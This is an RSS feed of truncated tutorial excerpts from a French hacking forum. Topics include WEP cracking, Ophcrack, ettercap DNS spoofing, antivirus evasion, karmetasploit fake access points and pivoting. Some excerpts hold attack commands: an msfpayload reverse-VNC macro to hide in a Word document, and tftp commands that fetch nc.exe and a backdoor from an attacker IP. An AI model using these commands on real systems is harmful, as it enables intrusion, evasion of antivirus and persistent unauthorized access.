http://badfu.sendboard.com/feed/? Derniers sujets Wed, 20 May 2009 12:08:56 GMT 10 http://hitskin.com/themes/10/00/83/i_logo.jpg http://badfu.sendboard.com/feed/? http://badfu.sendboard.com/tuto-f7/video-crack-wep-demo-t13.htm badfusion ]]> TuTo Wed, 20 May 2009 12:08:56 GMT http://badfu.sendboard.com/tuto-f7/video-crack-wep-demo-t13.htm#13 http://badfu.sendboard.com/tuto-f7/video-crack-wep-demo-t13.htm http://badfu.sendboard.com/tuto-f7/tuto-slapt-get-et-gslap-t12.htm badfusion Bonjour à tous, j'ai récemment décidé d'utiliser BT en système de tout les jours. Malheureusement l' application gslapt intégré n'est pas fonctionnelle. Après quelques recherches avec google : http://airdump.net/papers/backtrack-3-s … correcting http://kin.calvin.free.fr/blog/?p=16 Il suffit de télécharger ce pack : http://download.airdump.net/air/backtra … fix.tar.gz Désarchivez le pack, et placez vous dans le dossier bt3-fix. Ensuite installez les ... TuTo Wed, 20 May 2009 03:04:07 GMT http://badfu.sendboard.com/tuto-f7/tuto-slapt-get-et-gslap-t12.htm#12 http://badfu.sendboard.com/tuto-f7/tuto-slapt-get-et-gslap-t12.htm http://badfu.sendboard.com/tuto-f7/tuto-ophcrack-30-t11.htm badfusion Ophcrack est un logiciel libre permettant de casser les mots de passe des utilisateurs de systèmes d'exploitation Windows stockés en LM hash en utilisant les tables arc-en-ciel. Ce programme permet de casser 99.9% des mots de passe alpha-numériques d'une longueur inférieure ou égale à 14 caractères en quelques secondes, au pire en quelques minutes. Depuis la version 2.3, Ophcrack permet aussi de casser les mots de passe stockés en NT hash. /CF wikipedia 1) récupérer la ... TuTo Wed, 20 May 2009 03:00:10 GMT http://badfu.sendboard.com/tuto-f7/tuto-ophcrack-30-t11.htm#11 http://badfu.sendboard.com/tuto-f7/tuto-ophcrack-30-t11.htm http://badfu.sendboard.com/tuto-f7/tuto-ms09_002-internet-explorer-7-uninitialized-memory-corruption-par-s3th-t10.htm badfusion bon comme d'hab je vais faire court smile si vous ne savez pas vous servir d'ettercap et demetasploit RTFM smile On va commencer par créer un server dns local pour rediriger tout le traffic sur notre machine port 80 Code: bt # kedit /usr/local/share/ettercap/etter.dns * A 192.168.1.49 on lance notre spoof Code: bt ~ # ettercap -T -q -M arp:remote -P dns_spoof // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on eth0... (Ethernet) ... TuTo Wed, 20 May 2009 02:58:27 GMT http://badfu.sendboard.com/tuto-f7/tuto-ms09_002-internet-explorer-7-uninitialized-memory-corruption-par-s3th-t10.htm#10 http://badfu.sendboard.com/tuto-f7/tuto-ms09_002-internet-explorer-7-uninitialized-memory-corruption-par-s3th-t10.htm http://badfu.sendboard.com/tuto-f7/demo-video-scraper-autoscript-remote-desktop-config-par-neomatrix-t9.htm badfusion http://ne0matrix.blip.tv
Scraper.rb permet d'automatiser les taches de post-exploitation (meterpreter). (très utiles pour les payloads reverse_tcp smile))
Et il ya moyen de le customizer (upload de backdoors, édition de la base de registre etc...)]]> TuTo Wed, 20 May 2009 02:53:04 GMT http://badfu.sendboard.com/tuto-f7/demo-video-scraper-autoscript-remote-desktop-config-par-neomatrix-t9.htm#9 http://badfu.sendboard.com/tuto-f7/demo-video-scraper-autoscript-remote-desktop-config-par-neomatrix-t9.htm http://badfu.sendboard.com/tuto-f7/execution-flow-hijack-xor-encoding-decoding-par-neomatrix-t8.htm badfusion http://ne0matrix.blogspot.com/2009/05/e … ption.html http://blip.tv/file/2118662 <== vidéo Basé sur la présentation de Muts à la shmoocon (bypass AV) Le but est de changer la signature d'un .exe sans changer sa fontionnalité. Donc l'exe est encodé et stocké sur le disque dur, il ne se décode que lorsqu'il est éxécuté dans la mémoire virtuelle (hors de portée de l'AV). Résultats du scan sur virustotal.com: payload simple (30.00%), payload "msfencodé" ... TuTo Wed, 20 May 2009 02:50:55 GMT http://badfu.sendboard.com/tuto-f7/execution-flow-hijack-xor-encoding-decoding-par-neomatrix-t8.htm#8 http://badfu.sendboard.com/tuto-f7/execution-flow-hijack-xor-encoding-decoding-par-neomatrix-t8.htm http://badfu.sendboard.com/tuto-f7/tuto-fake-ap-avec-karmetasploit-par-s3th-t7.htm badfusion Nous allons voir ici comment créer un faux AP afin de récupérer les données transitant par notre pc, une fois que quelqu'un s'y est connecté. Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack. voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm. +--------+ +--------+ +-------------+ | router +----rj45-----+ NB BT3 +-----------+ ... TuTo Wed, 20 May 2009 02:49:20 GMT http://badfu.sendboard.com/tuto-f7/tuto-fake-ap-avec-karmetasploit-par-s3th-t7.htm#7 http://badfu.sendboard.com/tuto-f7/tuto-fake-ap-avec-karmetasploit-par-s3th-t7.htm http://badfu.sendboard.com/tuto-f7/tutos-et-howto--tuto-test-de-la-securite-de-son-site-server-web-par-s3th-t6.htm badfusion Nous allons commencer par utiliser quelques outils pour collecter des infos sur le server. - httprint - dimitry http://wiki.backtrack-fr.net/index.php/DMitry - nmap http://wiki.backtrack-fr.net/index.php/Nmap - amap http://wiki.backtrack-fr.net/index.php/Amap Code: bt linux # httprint -h 192.168.1.44 -s signatures.txt httprint v0.301 (beta) - web server fingerprinting tool (c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt http://net-square.com/httprint/ httprint@net-square.com Finger ... TuTo Wed, 20 May 2009 02:42:16 GMT http://badfu.sendboard.com/tuto-f7/tutos-et-howto--tuto-test-de-la-securite-de-son-site-server-web-par-s3th-t6.htm#6 http://badfu.sendboard.com/tuto-f7/tutos-et-howto--tuto-test-de-la-securite-de-son-site-server-web-par-s3th-t6.htm http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t5.htm badfusion Dans ce tuto, nous allons utiliser Metasploit pour créer une macro pour Word, laquelle une fois exécutée, lancera un reverse vnc. Et pour couronner le tout, le fichier Word contenant la macro passe sans encombres les tests des anti-virus. Créer la macro qui sera intégrée au fichier Word: ./msfpayload windows/vncinject/reverse_tcp LHOST=VOTRE_IP V > /chemin/du/fichier/vbvnc.bas et la transférer sur un poste windows Sous windows, ouvrir Word (la procédure suivante a été ... TuTo Wed, 20 May 2009 02:40:27 GMT http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t5.htm#5 http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t5.htm http://badfu.sendboard.com/tuto-f7/tuto-maintenir-un-acces-par-s3th-t4.htm badfusion Que faire une fois que l'on obtient un accès sur une machine distante via metasploit On commence par lancer notre service TFTPD et on place les fichiers que l'on voudra uploader dans notre répertoire tmp. voici les commandes à passer depuis notre shell Code:C:\WINDOWS\system32>tftp -i 149.133.9.191 GET /tmp/nc.exe C:\WINDOWS\system32\nc.exe C:\WINDOWS\system32>tftp -i 149.133.9.191 GET /tmp/Hbkdr.exe C:\WINDOWS\system32\Hbkdr.exe Ensuite ... TuTo Wed, 20 May 2009 02:33:49 GMT http://badfu.sendboard.com/tuto-f7/tuto-maintenir-un-acces-par-s3th-t4.htm#4 http://badfu.sendboard.com/tuto-f7/tuto-maintenir-un-acces-par-s3th-t4.htm http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t3.htm badfusion Dans ce tuto, nous allons utiliser Metasploit pour créer une macro pour Word, laquelle une fois exécutée, lancera un reverse vnc. Et pour couronner le tout, le fichier Word contenant la macro passe sans encombres les tests des anti-virus. Créer la macro qui sera intégrée au fichier Word: ./msfpayload windows/vncinject/reverse_tcp LHOST=VOTRE_IP V > /chemin/du/fichier/vbvnc.bas et la transférer sur un poste windows Sous windows, ouvrir Word (la procédure suivante a été ... TuTo Wed, 20 May 2009 02:26:06 GMT http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t3.htm#3 http://badfu.sendboard.com/tuto-f7/tuto-metasploit-reverse-vnc-cache-dans-un-fichier-word-par-mattoufoutu-t3.htm http://badfu.sendboard.com/tuto-f7/funairpwn-par-seb-taz-t2.htm badfusion airpwn permet d'injecter en live dans les trame tcp ce qui ce traduit par l'apparition de boite de dialogue, le remplacement des images, le remplacement des style css,... sur l'écran de tous les pc wifi de votre réseau Installation dans bt3 beta il manque le dossier avec les fichiers de configuration récupérez les http://sourceforge.net/project/showfile … _id=115632 et collez le dossier dans /pentest/wireless/airpwn-1.3 ( ne pas essayer de l'installer collez simplement ... TuTo Wed, 20 May 2009 02:23:22 GMT http://badfu.sendboard.com/tuto-f7/funairpwn-par-seb-taz-t2.htm#2 http://badfu.sendboard.com/tuto-f7/funairpwn-par-seb-taz-t2.htm http://badfu.sendboard.com/tuto-f7/tuto-installation-carte-wifi-intel-5100-t1.htm badfusion Bon messieurs trop de personne commence a poster sur le forum pour l'installation de la carte intel 5100 ayant cette carte je vous fais un petit tuto ici meme si je pense que ce n'est pas l'endroit mais bon ca c'est autre chose donc pour commencer pour que la carte sois prise en charge il faut au minimum un kernel 2.6.26 mais je conseil a partir du 2.6.28 puisque les drivers seront deja patcher donc upgrade du kernel puis on telecharge les ucode chez intel : telecharger http://intellinuxwireless.org/iwlwifi/downloads/iwlwifi-5000-ucode-5.4.A.11.tar.gz http://intellinuxwireless.org/iwlwifi/downloads/iwlwifi-4965-ucode-228.57.2.23.tgz extraire ... TuTo Wed, 20 May 2009 00:14:07 GMT http://badfu.sendboard.com/tuto-f7/tuto-installation-carte-wifi-intel-5100-t1.htm#1 http://badfu.sendboard.com/tuto-f7/tuto-installation-carte-wifi-intel-5100-t1.htm